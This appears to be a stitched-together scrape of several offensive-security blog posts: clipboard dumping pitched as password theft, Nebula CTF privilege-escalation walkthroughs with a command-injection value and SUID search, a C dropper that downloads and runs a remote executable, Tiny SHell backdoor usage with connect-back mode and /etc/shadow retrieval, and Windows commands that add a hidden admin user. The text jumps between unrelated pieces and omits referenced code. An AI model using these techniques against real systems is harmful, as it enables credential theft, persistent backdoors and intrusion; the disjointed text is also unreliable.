Now what? Steal all the passwords and secrets on the clipboard, just one of many things you can do…
powershell.exe Get-Clipboard
That’s it, literally! Put this in a nice loop, along with screenshots of Desktop and you will be left with a lot of juicy login creds, guaranteed!
Mac Clipboard Dump
pbpaste
Linux
As far as I know, all solutions are third part installs, way I usually dump this is from memory. Anyone have native command line ways to dump any Linux os clipboard?
Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.
These types of issues are common in easy CTFs, CTF VMs and more. The issue is generally when a command running as another use can be abused in some way, in linux most common ones that can be abused are wildcards * and directory trees. Today we will focus on a wildcard command that will enable us to do whatever we need to as the user, in this case flag03 because this cronjob runs as that user.
Solution #1
In our bash script we will use “chmod +s” as that sets user or group ID on execution, exactly what we want to spawn shell as user flag03.
First let’s create our exploit, we first need to know the user we want to mimic, since it’s a CTF VM we know it’s flag03, so we can run the following command:
Ok, so id 996, then the shell.c file should look like this…
shell.c
Now let’s create the ‘glue’ the script that will run as flag03, copy our shell, SetUID/GID and make it executable…
pwn.sh
Commands are run as follows:
nano /tmp/shell.c cd /home/flag03/writeable.d/ nano pwn.sh chmod +x pwn.sh
I have some great cron priv. esc. examples in the archives from old jobs/ctfs, when I get a change I will update this post on all things cron based priv. esc.
A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.
Of course “/bin/…/flag00” is seriously suspect, so we try this…
level00@nebula:~$ /bin/.../flag00 Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag You have successfully executed getflag on a target account
It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!
Search for SUID/GUID binaries
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
Challenge source is provided, can we spot the vulnerability?
We know we can alter environment variables and that the program will do the following:
setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.
With the source code, and access to the server, it’s easy to spot the issue:
If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.
nano /tmp/echo.c cc /tmp/echo.c -o /tmp/echo export PATH=/tmp/:$PATH cd /home/flag01 ./flag01 getflag
This one is easy, we can just inject a command into the USER environment variable.
cd /home/flag02 USER=";/bin/sh;" ./flag02 getflag
The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.Nebula – level 02 Recorded by int0x33asciinema.org
Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤
Dropper.c
I have had this code for years, served me well and was originally taken from a book called Advanced Persistent Threat Hacking which was quit good from what I remember.
This variant is used for system header files. It searches for a file named file in a standard list of system directories.
#include "file"
This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.
Here we first set up some variable again, then we concat some variables like PTL (protocol), DMN (domain) and FLE (file) to make the url we will request (https://10.10.10.10/sHELL.exe).
Then we use curl to get the file and save it with our callback, then we clean up like closing file handler and then we execute the file that was downloaded.
Note: Why am I posting this? Because today I forked it and will add features plus allow recursive file transfer, also some sneaky evasion stuff too. So I am posting this to give you all a background to the tool and also so you can star it on Github for updates if you want to get early releases.
First of all, you should setup your secret key, which is located in tsh.h; the key can be of any length (use at least 12 characters for better security).
It is advised to change SERVER_PORT, the port on which the server will be listening for incoming connections.
You may want to start tshd in “connect-back” mode if it runs on on a firewalled box; simply uncomment and modify CONNECT_BACK_HOST in tsh.h.
Compiling Tiny SHell
Run “make <system>”, where <system> can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf
How to use the server
It can be useful to set $HOME and the file creation mask before starting the server:
% umask 077; HOME=/var/tmp ./tshd
How to use the client
Make sure tshd is running on the remote host.
Start a shell:
./tsh <hostname>
Execute a command:
./tsh <hostname> “uname -a”
Transfer files:
./tsh <hostname> get /etc/shadow ./tsh <hostname> put vmlinuz /boot
Multiple file transfers
At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it.
./tsh host “stty raw; tar -cf — /etc 2>/dev/null” | tar -xvf
On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:
Please remember that the secret key is stored in clear inside both tsh and tshd executables; therefore you should make sure that no one except you has read access to these two files. However, you may choose not to store the real (valid) key in the client, which will then ask for a password when it starts.
I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤
Current User
whoami /all
On older machines, whoami might not be available so to find out the current user try the following:
echo %username%
All Users
net user
Add User
net user hacker hack3d /add
Make User Admin
net localgroup administrators hacker/add
Remove User
net user hacker /del
Files
type %SYSTEMDRIVE%\boot.ini type %WINDIR%\win.ini type %WINDIR%\System32\drivers\etc\hosts
We know the situation all to well, we have remote code execution and can upload and/or write files through a temperamental connection but want something a little more robust, something like netcat that always comes in so damn handy when pwing Unix systems.
A good tip that often comes in handy is to base64 encode a file, then simply copy the base64 blob to a file via a vuln or RCE and either decode first or after depending on your RCE situation. If you try and copy a file as-is in many situations the troublesome contents like language operators or null bytes etc will break the connection, application or worse, crash the target host.